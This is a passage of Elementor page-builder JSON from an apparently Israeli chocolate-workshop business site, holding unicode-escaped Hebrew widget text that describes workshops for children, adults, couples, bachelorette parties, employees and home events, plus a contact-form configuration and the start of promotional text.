\\u05ea\\u05d9\\u05e9\\u05db\\u05d7.\",\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/chocolate-workshops\\/chocolate-workshop-for-kids\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"image_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"image_size\":{\"unit\":\"%\",\"size\":55,\"sizes\":[]},\"title_bottom_space\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false},{\"id\":\"59b08ef\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"661603b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2019\\/12\\/Depositphotos_243662986_s-2019-1.jpg\",\"id\":413},\"title_text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05d1\\u05d5\\u05d2\\u05e8\\u05d9\\u05dd\",\"description_text\":\"\\u05db\\u05d9 \\u05d0\\u05d9\\u05df \\u05d2\\u05d9\\u05dc \\u05dc\\u05e9\\u05e7\\u05d5\\u05dc\\u05d3. \\u05d2\\u05dd \\u05dc\\u05e0\\u05d5 \\u05d4\\u05de\\u05d1\\u05d5\\u05d2\\u05e8\\u05d9\\u05dd \\u05de\\u05d5\\u05ea\\u05e8 \\u05dc\\u05d9\\u05d4\\u05e0\\u05d5\\u05ea \\u05de\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d7\\u05d5\\u05d5\\u05d9\\u05ea\\u05d9\\u05ea \\u05d1\\u05d4 \\u05e0\\u05db\\u05d9\\u05df \\u05d3\\u05d1\\u05e8\\u05d9\\u05dd \\u05de\\u05d9\\u05d5\\u05d7\\u05d3\\u05d9\\u05dd, \\u05e0\\u05d8\\u05e2\\u05dd \\u05d5\\u05e0\\u05dc\\u05de\\u05d3 \\u05e2\\u05dc \\u05d4\\u05d3\\u05d1\\u05e8 \\u05d4\\u05de\\u05d5\\u05e9\\u05dc\\u05dd \\u05d4\\u05d6\\u05d4 \\u05e9\\u05e0\\u05e7\\u05e8\\u05d0 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3.\",\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/chocolate-workshops\\/adult-chocolate-workshop\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"image_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"image_size\":{\"unit\":\"%\",\"size\":55,\"sizes\":[]},\"title_bottom_space\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false},{\"id\":\"4b95460\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"c0c0b4f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2019\\/12\\/Depositphotos_62137823_s-2019-1.jpg\",\"id\":414},\"title_text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d6\\u05d5\\u05d2\\u05d9\\u05ea\",\"description_text\":\" \\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d6\\u05d5\\u05d2\\u05d9\\u05ea \\u05e0\\u05d5\\u05e2\\u05d3\\u05d4 \\u05dc\\u05d0\\u05dc\\u05d5 \\u05d4\\u05de\\u05d7\\u05e4\\u05e9\\u05d9\\u05dd \\u05d7\\u05d5\\u05d5\\u05d9\\u05d4 \\u05de\\u05e7\\u05d5\\u05e8\\u05d9\\u05ea \\u05d5\\u05d9\\u05d9\\u05d7\\u05d5\\u05d3\\u05d9\\u05ea \\u05e9\\u05dc\\u05d0 \\u05d9\\u05e9\\u05db\\u05d7\\u05d5 \\u05dc\\u05e2\\u05d5\\u05dc\\u05dd. \\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d6\\u05d5\\u05d2\\u05d5\\u05ea \\u05de\\u05ea\\u05d0\\u05d9\\u05de\\u05d4 \\u05d2\\u05dd \\u05db\\u05de\\u05ea\\u05e0\\u05d4 \\u05d0\\u05d5 \\u05db\\u05d4\\u05e6\\u05e2\\u05ea \\u05e0\\u05d9\\u05e9\\u05d5\\u05d0\\u05d9\\u05df \\u05d5\\u05e0\\u05d9\\u05ea\\u05df \\u05dc\\u05e2\\u05e8\\u05d5\\u05da \\u05d0\\u05d5\\u05ea\\u05d4 \\u05d1\\u05db\\u05dc \\u05de\\u05e7\\u05d5\\u05dd \\u05e9\\u05ea\\u05e8\\u05e6\\u05d5.\",\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/chocolate-workshops\\/chocolate-workshop-for-couples\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"image_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"image_size\":{\"unit\":\"%\",\"size\":55,\"sizes\":[]},\"title_bottom_space\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7b7ce5f\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"5817cff\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7a1d0cb\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2019\\/12\\/Depositphotos_53956819_s-2019-1.jpg\",\"id\":416},\"title_text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05e1\\u05d9\\u05d1\\u05ea \\u05e8\\u05d5\\u05d5\\u05e7\\u05d5\\u05ea\",\"description_text\":\"\\u05d4\\u05d7\\u05d1\\u05e8\\u05d4 \\u05d4\\u05db\\u05d9 \\u05d8\\u05d5\\u05d1\\u05d4 \\u05de\\u05ea\\u05d7\\u05ea\\u05e0\\u05ea \\u05d5\\u05d0\\u05ea \\u05de\\u05d0\\u05e8\\u05d2\\u05e0\\u05ea \\u05dc\\u05d4 \\u05d0\\u05ea \\u05d4\\u05d0\\u05d8\\u05e8\\u05e7\\u05e6\\u05d9\\u05d4 \\u05dc\\u05de\\u05e1\\u05d9\\u05d1\\u05d4. \\u05e0\\u05db\\u05d5\\u05df, \\u05e0\\u05de\\u05d0\\u05e1 \\u05de\\u05db\\u05dc \\u05d4\\u05d4\\u05e4\\u05e2\\u05dc\\u05d5\\u05ea \\u05d4\\u05e0\\u05d3\\u05d5\\u05e9\\u05d5\\u05ea \\u05d5\\u05d4\\u05d2\\u05d9\\u05e2 \\u05d4\\u05d6\\u05de\\u05df \\u05dc\\u05d7\\u05d3\\u05e9. \\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05e1\\u05d9\\u05d1\\u05ea \\u05e8\\u05d5\\u05d5\\u05e7\\u05d5\\u05ea \\u05e0\\u05d5\\u05e2\\u05d3\\u05d4 \\u05e2\\u05d1\\u05d5\\u05e8 \\u05d0\\u05dc\\u05d5 \\u05d4\\u05de\\u05d7\\u05e4\\u05e9\\u05d5\\u05ea  \\u05dc\\u05d2\\u05d5\\u05d5\\u05df  \\u05d0\\u05ea \\u05d4\\u05d4\\u05e4\\u05e2\\u05dc\\u05d5\\u05ea \\u05d4\\u05e9\\u05d2\\u05e8\\u05ea\\u05d9\\u05d5\\u05ea \\u05d5\\u05de\\u05d1\\u05d8\\u05d9\\u05d7\\u05d4 \\u05d7\\u05d5\\u05d5\\u05d9\\u05d9\\u05d4 \\u05d1\\u05dc\\u05ea\\u05d9 \\u05e0\\u05e9\\u05db\\u05ea \\u05dc\\u05db\\u05dc\\u05d4 \\u05dc\\u05e2\\u05ea\\u05d9\\u05d3 \\u05d5\\u05dc\\u05db\\u05dc \\u05d4\\u05d7\\u05d1\\u05e8\\u05d5\\u05ea \\u05d4\\u05de\\u05e9\\u05ea\\u05ea\\u05e4\\u05d5\\u05ea\",\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/chocolate-workshops\\/chocolate-workshop-for-bachelorette-party\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"image_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"image_size\":{\"unit\":\"%\",\"size\":55,\"sizes\":[]},\"title_bottom_space\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false},{\"id\":\"ce1b43d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"23fa8d2\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2019\\/12\\/Depositphotos_247319794_s-2019-1.jpg\",\"id\":418},\"title_text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05e2\\u05d5\\u05d1\\u05d3\\u05d9\\u05dd \\u05d5\\u05d7\\u05d1\\u05e8\\u05d5\\u05ea\",\"description_text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05e2\\u05d5\\u05d1\\u05d3\\u05d9\\u05dd \\u05de\\u05d9\\u05d5\\u05e2\\u05d3\\u05ea \\u05e2\\u05d1\\u05d5\\u05e8 \\u05d0\\u05dc\\u05d5 \\u05d4\\u05de\\u05d7\\u05e4\\u05e9\\u05d9\\u05dd \\u05d9\\u05d5\\u05dd \\u05d2\\u05d9\\u05d1\\u05d5\\u05e9 \\u05d0\\u05d5 \\u05e2\\u05e8\\u05d1 \\u05d2\\u05d9\\u05d1\\u05d5\\u05e9 \\u05db\\u05d9\\u05d9\\u05e4\\u05d9 \\u05d5\\u05de\\u05e7\\u05d5\\u05e8\\u05d9 \\u05d1\\u05de\\u05d9\\u05d5\\u05d7\\u05d3. \\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05e2\\u05d5\\u05d1\\u05d3\\u05d9\\u05dd \\u05de\\u05d2\\u05d1\\u05e9\\u05ea, \\u05de\\u05e8\\u05d2\\u05e9\\u05ea \\u05d5\\u05d1\\u05dc\\u05ea\\u05d9 \\u05e0\\u05e9\\u05db\\u05d7\\u05ea.\",\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/?page_id=100\",\"is_external\":\"\",\"nofollow\":\"\"},\"image_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"image_size\":{\"unit\":\"%\",\"size\":55,\"sizes\":[]},\"title_bottom_space\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false},{\"id\":\"3a32e3a\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a0f0677\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2019\\/12\\/Depositphotos_72660625_s-2019-1.jpg\",\"id\":420},\"title_text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d1\\u05d1\\u05d9\\u05ea\",\"description_text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d1\\u05d1\\u05d9\\u05ea \\u05de\\u05ea\\u05d0\\u05d9\\u05de\\u05d4 \\u05dc\\u05db\\u05dc \\u05d0\\u05dc\\u05d5 \\u05d4\\u05de\\u05d7\\u05e4\\u05e9\\u05d9\\u05dd \\u05dc\\u05d4\\u05e4\\u05d9\\u05e7 \\u05d0\\u05d9\\u05e8\\u05d5\\u05e2 \\u05de\\u05d1\\u05dc\\u05d9 \\u05dc\\u05e6\\u05d0\\u05ea \\u05de\\u05d4\\u05d1\\u05d9\\u05ea. \\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05de\\u05d4\\u05d1\\u05d9\\u05ea \\u05de\\u05ea\\u05d0\\u05d9\\u05de\\u05d4 \\u05dc\\u05d9\\u05de\\u05d9 \\u05d4\\u05d5\\u05dc\\u05d3\\u05ea, \\u05e2\\u05e8\\u05d1\\u05d9 \\u05d2\\u05d9\\u05d1\\u05d5\\u05e9, \\u05d4\\u05e6\\u05e2\\u05ea \\u05e0\\u05d9\\u05e9\\u05d5\\u05d0\\u05d9\\u05df, \\u05d7\\u05d5\\u05d5\\u05d9\\u05d4 \\u05de\\u05e9\\u05e4\\u05d7\\u05ea\\u05d9\\u05ea, \\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d6\\u05d5\\u05d2\\u05d9\\u05ea \\u05d5\\u05e2\\u05d5\\u05d3. \\u05d4\\u05e6\\u05d9\\u05d5\\u05d3 \\u05e2\\u05dc\\u05d9\\u05e0\\u05d5, \\u05dc\\u05db\\u05dd \\u05e0\\u05e9\\u05d0\\u05e8 \\u05e8\\u05e7 \\u05dc\\u05d9\\u05d4\\u05e0\\u05d5\\u05ea\",\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/chocolate-workshops\\/home-chocolate-workshop\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"image_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"image_size\":{\"unit\":\"%\",\"size\":55,\"sizes\":[]},\"title_bottom_space\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4f4d3ed\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"174e916\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"8132cb7\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e8\\u05d5\\u05e6\\u05d4 \\u05e9\\u05e4\\u05e9\\u05d5\\u05d8 \\u05e0\\u05d7\\u05d6\\u05d5\\u05e8 \\u05d0\\u05dc\\u05d9\\u05da \\u05e2\\u05dd \\u05db\\u05dc \\u05d4\\u05e4\\u05e8\\u05d8\\u05d9\\u05dd?\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"115d6a7\",\"elType\":\"widget\",\"settings\":{\"form_name\":\"\\u05d8\\u05d5\\u05e4\\u05e1 \\u05d7\\u05d3\\u05e9\",\"form_fields\":[{\"custom_id\":\"name\",\"field_type\":\"text\",\"field_label\":\"\\u05e9\\u05dd\",\"placeholder\":\"\\u05e9\\u05dd\",\"width\":\"100\",\"_id\":\"11ed1fb\",\"required\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"recaptcha_badge\":\"bottomright\",\"css_classes\":\"\",\"field_value\":\"\"},{\"custom_id\":\"email\",\"field_type\":\"email\",\"required\":\"true\",\"field_label\":\"\\u05d0\\u05d9\\u05de\\u05d9\\u05d9\\u05dc\",\"placeholder\":\"\\u05d0\\u05d9\\u05de\\u05d9\\u05d9\\u05dc\",\"width\":\"100\",\"_id\":\"f7dd8de\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"recaptcha_badge\":\"bottomright\",\"css_classes\":\"\",\"field_value\":\"\"},{\"custom_id\":\"message\",\"field_type\":\"textarea\",\"field_label\":\"\\u05d4\\u05d5\\u05d3\\u05e2\\u05d4\",\"placeholder\":\"\\u05d4\\u05d5\\u05d3\\u05e2\\u05d4\",\"width\":\"100\",\"_id\":\"cc2cf05\",\"required\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"recaptcha_badge\":\"bottomright\",\"css_classes\":\"\",\"field_value\":\"\"}],\"button_text\":\"\\u05e9\\u05dc\\u05d9\\u05d7\\u05d4\",\"email_to\":\"shmulik@shmul.co.il\",\"email_subject\":\"\\u05d4\\u05d5\\u05d3\\u05e2\\u05d4 \\u05d7\\u05d3\\u05e9\\u05d4 \\u05de\\u05d0\\u05ea \\\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d34U\\\"\",\"email_content\":\"[all-fields]\",\"email_from\":\"email@chocolate4u.co.il\",\"email_from_name\":\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d34U\",\"email_to_2\":\"shmulik@shmul.co.il\",\"email_subject_2\":\"\\u05d4\\u05d5\\u05d3\\u05e2\\u05d4 \\u05d7\\u05d3\\u05e9\\u05d4 \\u05de\\u05d0\\u05ea \\\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d34U\\\"\",\"email_content_2\":\"[all-fields]\",\"email_from_2\":\"email@chocolate4u.co.il\",\"email_from_name_2\":\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d34U\",\"email_reply_to_2\":\"shmulik@shmul.co.il\",\"success_message\":\"\\u05d4\\u05d8\\u05d5\\u05e4\\u05e1 \\u05e0\\u05e9\\u05dc\\u05d7 \\u05d1\\u05d4\\u05e6\\u05dc\\u05d7\\u05d4.\",\"error_message\":\"\\u05d4\\u05ea\\u05e8\\u05d7\\u05e9\\u05d4 \\u05e9\\u05d2\\u05d9\\u05d0\\u05d4.\",\"required_field_message\":\"\\u05e9\\u05d3\\u05d4 \\u05d6\\u05d4 \\u05d4\\u05d5\\u05d0 \\u05e9\\u05d3\\u05d4 \\u05d7\\u05d5\\u05d1\\u05d4.\",\"invalid_message\":\"\\u05de\\u05e9\\u05d4\\u05d5 \\u05d4\\u05e9\\u05ea\\u05d1\\u05e9. \\u05d4\\u05d8\\u05d5\\u05e4\\u05e1 \\u05d0\\u05d9\\u05e0\\u05d5 \\u05d7\\u05d5\\u05e7\\u05d9.\"},\"elements\":[],\"widgetType\":\"form\"},{\"id\":\"d555ad1\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2>\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05dc\\u05d3, \\u05dc\\u05dc\\u05de\\u05d5\\u05d3 \\u05e2\\u05dc \\u05d7\\u05d5\\u05de\\u05e8 \\u05d4\\u05d2\\u05dc\\u05dd \\u05d4\\u05d8\\u05e2\\u05d9\\u05dd \\u05d1\\u05e2\\u05d5\\u05dc\\u05dd<\\/h2><p>\\u05e8\\u05d1\\u05d9\\u05dd \\u05d0\\u05d5\\u05d4\\u05d1\\u05d9\\u05dd \\u05de\\u05d0\\u05d5\\u05d3 \\u05dc\\u05d0\\u05db\\u05d5\\u05dc \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05e2\\u05dc \\u05d1\\u05e1\\u05d9\\u05e1 \\u05d9\\u05d5\\u05de\\u05d9 \\u05d5\\u05e0\\u05d4\\u05e0\\u05d9\\u05dd \\u05de\\u05d4\\u05d8\\u05e2\\u05dd \\u05d4\\u05de\\u05ea\\u05d5\\u05e7 \\u05e2\\u05dc \\u05d4\\u05dc\\u05e9\\u05d5\\u05df. \\u05d7\\u05dc\\u05e7 \\u05dc\\u05d0 \\u05e7\\u05d8\\u05df \\u05de\\u05e2\\u05d5\\u05e0\\u05d9\\u05d9\\u05df \\u05d3\\u05d5\\u05d5\\u05e7\\u05d0 \\u05dc\\u05d3\\u05e2\\u05ea \\u05d0\\u05d9\\u05da \\u05dc\\u05e2\\u05d1\\u05d5\\u05d3 \\u05d1\\u05e6\\u05d5\\u05e8\\u05d4 \\u05e0\\u05db\\u05d5\\u05e0\\u05d4 \\u05e2\\u05dd \\u05d7\\u05d5\\u05de\\u05e8 \\u05d4\\u05d2\\u05dc\\u05dd \\u05d4\\u05d9\\u05d5\\u05e7\\u05e8\\u05ea\\u05d9 \\u05d4\\u05d6\\u05d4, \\u05de\\u05d4 \\u05d4\\u05d3\\u05e8\\u05da \\u05d4\\u05db\\u05d9 \\u05d8\\u05d5\\u05d1\\u05d4 \\u05dc\\u05e9\\u05dc\\u05d1 \\u05d0\\u05d5\\u05ea\\u05d5 \\u05d1\\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd, \\u05d0\\u05d9\\u05da \\u05d4\\u05db\\u05d9 \\u05e0\\u05db\\u05d5\\u05df \\u05dc\\u05d8\\u05de\\u05e4\\u05e8\\u05e8 \\u05d0\\u05d5\\u05ea\\u05d5 \\u05d5\\u05dc\\u05d9\\u05e6\\u05d5\\u05e8 \\u05de\\u05de\\u05e0\\u05d5 \\u05d9\\u05e6\\u05d9\\u05e8\\u05d5\\u05ea \\u05d9\\u05e4\\u05d9\\u05e4\\u05d9\\u05d5\\u05ea, \\u05d5\\u05d2\\u05dd \\u05de\\u05d4 \\u05d4\\u05d3\\u05e8\\u05db\\u05d9\\u05dd \\u05d4\\u05db\\u05d9 \\u05d8\\u05d5\\u05d1\\u05d5\\u05ea \\u05dc\\u05d8\\u05e4\\u05dc \\u05d1\\u05d5 \\u05d1\\u05e6\\u05d5\\u05e8\\u05d4 \\u05e9\\u05ea\\u05d5\\u05e6\\u05d9\\u05d0 \\u05de\\u05de\\u05e0\\u05d5 \\u05d0\\u05ea \\u05d4\\u05d0\\u05e8\\u05d5\\u05de\\u05d5\\u05ea \\u05d4\\u05d8\\u05d5\\u05d1\\u05d5\\u05ea \\u05d1\\u05d9\\u05d5\\u05ea\\u05e8 \\u05e9\\u05d9\\u05ea\\u05e8\\u05de\\u05d5 \\u05dc\\u05d8\\u05e2\\u05dd \\u05d4\\u05db\\u05dc\\u05dc\\u05d9 \\u05e9\\u05dc \\u05d4\\u05e7\\u05d9\\u05e0\\u05d5\\u05d7.<\\/p><h2>\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d1\\u05d1\\u05d9\\u05ea, \\u05de\\u05d4 \\u05d6\\u05d4 \\u05d0\\u05d5\\u05de\\u05e8?<\\/h2><p>\\u05dc\\u05de\\u05e2\\u05e9\\u05d4 \\u05de\\u05d3\\u05d5\\u05d1\\u05e8 \\u05d1\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d9\\u05d9\\u05d7\\u05d5\\u05d3\\u05d9\\u05ea \\u05d5\\u05d8\\u05e2\\u05d9\\u05de\\u05d4 \\u05e9\\u05ea\\u05d5\\u05db\\u05dc\\u05d5 \\u05dc\\u05e2\\u05e9\\u05d5\\u05ea \\u05d0\\u05e6\\u05dc\\u05db\\u05dd \\u05d1\\u05d1\\u05d9\\u05ea. <br \\/>\\u05db\\u05dc \\u05e1\\u05d3\\u05e0\\u05d4 \\u05de\\u05d5\\u05ea\\u05d0\\u05de\\u05ea \\u05dc\\u05de\\u05d0\\u05d5\\u05e8\\u05e2, \\u05dc\\u05d0\\u05d5\\u05e4\\u05d9 \\u05d4\\u05de\\u05e9\\u05ea\\u05ea\\u05e4\\u05d9\\u05dd \\u05d5\\u05dc\\u05db\\u05de\\u05d5\\u05ea \\u05d4\\u05de\\u05e9\\u05ea\\u05ea\\u05e4\\u05d9\\u05dd \\u05d1\\u05e1\\u05d3\\u05e0\\u05d4 \\u05e2\\u05e6\\u05de\\u05d4 (\\u05dc\\u05de\\u05e9\\u05dc, \\u05e0\\u05d9\\u05ea\\u05df \\u05dc\\u05e2\\u05e8\\u05d5\\u05da \\u05d1\\u05d1\\u05d9\\u05ea \\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d6\\u05d5\\u05d2\\u05d5\\u05ea, \\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05de\\u05e9\\u05e4\\u05d7\\u05ea\\u05d9\\u05ea, \\u05dc\\u05de\\u05d1\\u05d5\\u05d2\\u05e8\\u05d9\\u05dd \\u05d5\\u05e2\\u05d5\\u05d3), \\u05d1\\u05db\\u05dc \\u05e1\\u05d3\\u05e0\\u05d4 \\u05ea\\u05d5\\u05db\\u05dc\\u05d5 \\u05dc\\u05dc\\u05de\\u05d5\\u05d3 \\u05db\\u05d9\\u05e6\\u05d3 \\u05dc\\u05e0\\u05e6\\u05dc \\u05d0\\u05ea \\u05d7\\u05d5\\u05de\\u05e8\\u05d9 \\u05d4\\u05d2\\u05dc\\u05dd \\u05e9\\u05d9\\u05e9 \\u05dc\\u05db\\u05dd \\u05d1\\u05de\\u05e7\\u05e8\\u05e8 \\u05d1\\u05d1\\u05d9\\u05ea, \\u05d5\\u05de\\u05d5\\u05e6\\u05e8\\u05d9 \\u05d4\\u05d0\\u05e4\\u05d9\\u05d4 \\u05e9\\u05d9\\u05e9 \\u05d1\\u05db\\u05dc \\u05d0\\u05e8\\u05d5\\u05df, \\u05e2\\u05dc \\u05de\\u05e0\\u05ea \\u05dc\\u05d4\\u05db\\u05d9\\u05df \\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05de\\u05e8\\u05e9\\u05d9\\u05de\\u05d9\\u05dd \\u05d5\\u05d8\\u05e2\\u05d9\\u05de\\u05d9\\u05dd.<\\/p><p>\\u05dc\\u05de\\u05e2\\u05e9\\u05d4 \\u05dc\\u05d0 \\u05e6\\u05e8\\u05d9\\u05da \\u05d4\\u05db\\u05e0\\u05d4 \\u05de\\u05d9\\u05d5\\u05d7\\u05d3\\u05ea, \\u05d5\\u05dc\\u05d0 \\u05ea\\u05d0\\u05dc\\u05e6\\u05d5 \\u05dc\\u05e8\\u05db\\u05d5\\u05e9 \\u05de\\u05d5\\u05e6\\u05e8\\u05d9\\u05dd \\u05d1\\u05d0\\u05d5\\u05e4\\u05df \\u05de\\u05d9\\u05d5\\u05d7\\u05d3. <br \\/>\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d1\\u05d1\\u05d9\\u05ea \\u05de\\u05d5\\u05ea\\u05d0\\u05de\\u05ea \\u05dc\\u05de\\u05d5\\u05e6\\u05e8\\u05d9\\u05dd \\u05e9\\u05d9\\u05e9 \\u05dc\\u05db\\u05dd \\u05d1\\u05d1\\u05d9\\u05ea, \\u05dc\\u05ea\\u05e0\\u05d5\\u05e8 \\u05d4\\u05d1\\u05d9\\u05ea\\u05d9, \\u05dc\\u05de\\u05d9\\u05e7\\u05e1\\u05e8, \\u05dc\\u05de\\u05d8\\u05e8\\u05e4\\u05d4 \\u05d5\\u05d0\\u05e4\\u05d9\\u05dc\\u05d5 \\u05dc\\u05de\\u05e7\\u05e8\\u05e8 \\u05d4\\u05d1\\u05d9\\u05ea\\u05d9, \\u05e2\\u05dc \\u05de\\u05e0\\u05ea \\u05e9\\u05ea\\u05d5\\u05db\\u05dc\\u05d5 \\u05dc\\u05e9\\u05d5\\u05d1 \\u05d5\\u05dc\\u05e9\\u05d7\\u05d6\\u05e8 \\u05d0\\u05ea \\u05d4\\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd \\u05dc\\u05d1\\u05d3\\u05db\\u05dd.<\\/p><h2>\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05d1\\u05d5\\u05d2\\u05e8\\u05d9\\u05dd, \\u05dc\\u05d0\\u05d9\\u05e8\\u05d5\\u05e2\\u05d9\\u05dd \\u05d4\\u05d7\\u05e9\\u05d5\\u05d1\\u05d9\\u05dd \\u05d1\\u05d7\\u05d9\\u05d9\\u05dd<\\/h2><p>\\u05dc\\u05d0 \\u05de\\u05e2\\u05d8 \\u05d0\\u05e0\\u05e9\\u05d9\\u05dd \\u05d1\\u05d5\\u05d7\\u05e8\\u05d9\\u05dd \\u05d1\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05d1\\u05d5\\u05d2\\u05e8\\u05d9\\u05dd \\u05e2\\u05dc \\u05de\\u05e0\\u05ea \\u05dc\\u05d7\\u05d2\\u05d5\\u05d2 